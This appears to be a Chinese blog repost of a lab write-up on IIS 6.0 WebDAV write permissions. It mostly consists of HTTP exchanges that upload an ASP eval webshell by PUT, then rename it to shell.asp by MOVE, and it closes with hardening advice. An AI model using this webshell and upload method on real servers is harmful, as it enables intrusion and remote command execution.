解析IIS可以PUT，但无法MOVE的原因

今天在测试IIS的put漏洞时，发现可以put所有IIS的不能解析的文件，move也正常，但是却无法move为asp、asa等IIS可以解析的文件，在网上搜索了一段文章后，发现是因为IIS的配置中，没有选上上“脚本资源访问”所致。一般情况下IIS的配置都会选上这个，但是就让我碰上了，下面这篇文章对这类问题进行了详细的说明，转过来记录下。
原文地址：小议IIS的特殊权限
写了《小议IIS的特殊权限》一文之后，在一次实验室内部报告中，我给大家演示了IIS写权限的利用，但是却没有成功，很纳闷啊。明明我之前都测试过的，怎么会不行了呢？看来肯定是IIS配置的问题了。那次演示我用的是新装的Win2003虚拟机，IIS采用的默认的设置，勾选上了主目录标签页下的“写入”复选框。失败的两个地方：
（1）OPTIONS 命令无法查看IIS支持的方法集合。
提 交如下报文：
OPTIONS / HTTP/1.1
Host: www.redicecn.cn
返回如下报文：
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD
Content-Length: 0
Server: Microsoft-IIS/6.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:39:56 GMT
注释：没有返回IIS 支持的方法集合。
（2）PUT asp文件及txt文件均失败。
提交如下报文：
PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26
<%eval(request(“cmd”))%>
返回如下报文：
HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:50:53 GMT
注释：没有成功写入。
提交如下报文：
PUT /test.asp HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26
<%eval(request(“cmd”))%>
返回如下报文：
HTTP/1.1 404 Not Found
Content-Length: 83
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 07:43:07 GMT
< /head>系统找不到指定的文件。

注 释：没有成功写入。
问题的解决：
今天突然在IIS的“Web服务扩展”列表中看到了“WebDAV”是被禁用 的，会不会是因为“WebDAV”被禁用了的原因呢？
启用“WebDAV”，哈哈，竟然成功了，果然是“WebDAV”被禁用了的原因。
再 次提交如下报文（OPTIONS命令）：
OPTIONS / HTTP/1.1
Host: www.redicecn.cn
返回如下报文：
HTTP/1.1 200 OK
Date: Fri, 01 Jan 2010 07:54:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
注释：IIS成功返回支持的方法集合。
再 次提交如下报文：
PUT /test.txt HTTP/1.1
Host: www.redicecn.cn
Content-Length: 26
<%eval(request(“cmd”))%>
返 回如下报文：
HTTP/1.1 201 Created
Date: Fri, 01 Jan 2010 07:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
成功在IIS根目录写入了 test.txt文件。但是直接PUT asp文件还是返回同样的错误信息。小黑们通常采用的方法就是先PUT txt马，然后使用MOVE方法将txt马改名成asp马。
尝试提交如下报文：
MOVE /test.txt HTTP/1.1
Host: www.redicecn.cn
Destination: http://www.redicecn.cn/shell.asp
返 回如下报文：
HTTP/1.1 207 Multi-Status
Date: Fri, 01 Jan 2010 08:02:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/shell.asp
Content-Type: text/xml
Transfer-Encoding: chunked
b8
<?xml version=”1.0″?>http://www.redicecn.cn/shell.aspHTTP/1.1 403 Forbidden
0
注 释：失败了，郁闷啊。看来IIS上还有什么机关啊。陷入僵局….
2010年的早晨我翻了一下《黑客渗透笔记》（知识型流氓给我的，他 的朋友冰的原点写的书，送了他两本），在《深入分析IIS写权限》一节中，我发现作者碰到了和我一样的问题，他给出的解决方案是勾选“脚本资源访问”复选 框。测试一下：
提交如下报文：
MOVE /test.txt HTTP/1.1
Host: www.redicecn.cn
Destination: http://www.redicecn.cn/shell.asp
返 回如下报文:
HTTP/1.1 201 Created
Date: Fri, 01 Jan 2010 08:09:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.redicecn.cn/shell.asp
Content-Type: text/xml
Content-Length: 0
成功了。我还测试了一下在没有勾选“脚本资源访问”复选框的情况下是可以 使用MOVE将文件更名为非脚本文件名的，例如gif，txt。
但是直接PUT asp文件还是返回同样的错误信息。看来这个问题还真不好解决，暂且放下吧。
最后我还想测试一下，NTFS权限的设置是否能够对IIS的 写权限产生影响：
测试一：
站点根目录设置IIS匿名帐户的权限为允许“读取和运行，列出文件夹目录，读取”，其它未勾选。经测 试，可以成功PUT写入文件。
测试二：
站点根目录设置IIS匿名帐户的权限为允许“读取和运行，列出文件夹目录，读 取”，并且勾选禁止“写入”。经测试，可以PUT写入文件失败。返回报文如下：
HTTP/1.1 401 Unauthorized
Content-Length: 75
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Jan 2010 08:33:09 GMT
< /head>错误: 拒绝访问。
注释：写入操作被 拒绝。
现在该总结一下了：
（1）如果没有启用“WebDAV”扩展，OPTIONS命令是无法查看IIS支持的方法集合 的。即便是复选上了“写入”，仍然无法写入txt文件（asp的当然也不行）。
（2）启用了“WebDAV”扩展，并且复选了“写入”，就可以写 入txt文件了。要想使用MOVE命令将其更名为脚本文件后缀，必须还复选上“脚本资源访问”。
（3）只有设置了IIS匿名帐户禁止“写入”的 NTFS权限，才能拒绝写入。注意：这个拒绝写入的权限是大家很容易忽视的，如果未设置，还是可以成功写入文件的。它并不单单是针对IIS写权限的，我曾 用脚本木马测试过，如果没有禁止写入，脚本木马还是可以创建和修改文件的。关于Win2003的安全设置策略，可以参加我的另外一篇文章《Windows 服务器安全设置攻略》。
安全提示：不要开启“WebDAV”扩展！